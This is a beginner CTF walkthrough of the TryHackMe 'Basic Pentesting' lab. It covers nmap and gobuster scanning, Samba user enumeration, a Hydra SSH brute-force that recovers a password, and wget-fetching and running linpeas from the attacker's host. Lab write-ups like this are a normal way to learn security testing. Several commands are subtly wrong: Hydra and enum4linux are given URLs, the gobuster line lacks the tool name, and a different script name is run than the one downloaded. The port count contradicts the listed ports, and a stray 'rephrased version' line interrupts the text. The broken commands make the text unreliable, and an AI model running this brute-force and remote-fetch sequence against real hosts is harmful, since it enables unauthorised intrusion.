Basic Pentesting TryHackMe

This is a beginner-level CTF challenge that involves brute-forcing, hash cracking, service enumeration, and Linux enumeration. The main goal is to help you learn or practice basic penetration testing tools.

You know the drill already .. happy hacking

Task 1 . Web App Testing and Privilege Escalation

As usual, we begin with a network scan using our favorite tool, Nmap.

NMAP RESULT

# nmap -T4 -sV -p- -sC 10.10.100.46
Starting Nmap 7.93 ( https://nmap.org ) at 2025-03-17 20:39 UTC
Nmap scan report for ip-10-10-100-46.eu-west-1.compute.internal (10.10.100.46)
Host is up (0.0040s latency).
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db45cbbe4a8b71f8e93142aefff845e4 (RSA)
|   256 09b9b91ce0bf0e1c6f7ffe8e5f201bce (ECDSA)
|_  256 a5682b225f984a62213da2e2c5a9f7c2 (ED25519)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http        Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.7
MAC Address: 02:DE:DD:2F:58:83 (Unknown)
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.51 seconds

we can see there are 4 open ports

SSH (22/tcp)
HTTP (80/tcp)
NetBIOS (139/tcp, 445/tcp)
AJP (8009/tcp)
Apache Tomcat (8080/tcp)

knowing there is some thing on the port 80 I spin up a browser and search the given ip address 10.10.100.46 but When I visited the website I get this

Next, for the second phase of enumeration, since we see that HTTP is running, we’ll check the website in a browser. Additionally, we will use tools like Gobuster to brute force the website’s files and directories.

Gobuster Result

# dir -u http://10.10.100.46/ -w /usr/share/wordlists/dirb/big.txt    
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.100.46/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2025/03/17 21:28:45 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 296]
/.htpasswd            (Status: 403) [Size: 296]
/development          (Status: 301) [Size: 318] [–> http://10.10.100.46/development/]
/server-status        (Status: 403) [Size: 300]
Progress: 17119 / 20470 (83.63%)===============================================================
2025/03/17 21:28:47 Finished

we got a directory using Gobuster again the IP address http:/targetIP//development/

now when I visit the with the /development I get something

I click on those file and find something interesting on /dev.txt

I check another file just /j.txt and got this

We’ve gathered useful info from port 80, but let’s not get ahead of ourselves until we’ve fully explored everything. Now, let’s check the website on port 8080/http—it appears to be an Apache Tomcat 9.0.7 page. Let’s see what we find.

If you check the nmap scan results again, you’ll notice that the Samba service is running. I’ll use enum4linux to gather information on the users.

enum4linux -a http://targetIP/

here is the rephrased version:

We have the usernames Kay and Jan. What is the password to brute force SSH using Hydra?

hydra -l jan -P /usr/share/wordlists/rockyou.txt http://targetIP/ ssh

After sometime we get the result :

login: jan   password: armando

Let’s log in using ssh

ssh jan@targetIP

I want the user.txt flag after gaining control of the target host. Enumerate the machine to find any vectors for privilege escalation. Using LinPeas can help identify vulnerabilities or possible ways to escalate privileges to root.

python -m http.server 8080

where you have linpeas.sh located.
I want to wget get this file to /tmp directory, so I’ll cd into that

cd /tmp

wget http://<YOUR_THM_IP>:8080/linpeas.sh
chmod +x linpeas.sh
./leanness.sh

Related Posts

You Got Mail TryHackme